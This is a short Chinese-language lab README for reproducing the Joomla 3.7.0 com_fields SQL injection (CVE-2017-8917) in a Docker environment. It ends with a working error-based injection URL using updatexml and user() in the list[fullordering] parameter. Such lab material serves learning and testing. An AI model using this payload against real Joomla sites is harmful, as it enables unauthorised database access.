Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。

Joomla在3.7.0中新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。com_fields组件由于对请求数据过滤不严导致了SQL注入。

参考链接:

测试环境

执行如下命令启动一个Joomla 3.7.0服务:

docker compose up -d

启动后访问http://your-ip:8080即可看到Joomla的安装界面和测试数据。

漏洞复现

直接访问http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1),即可看到SQL报错信息: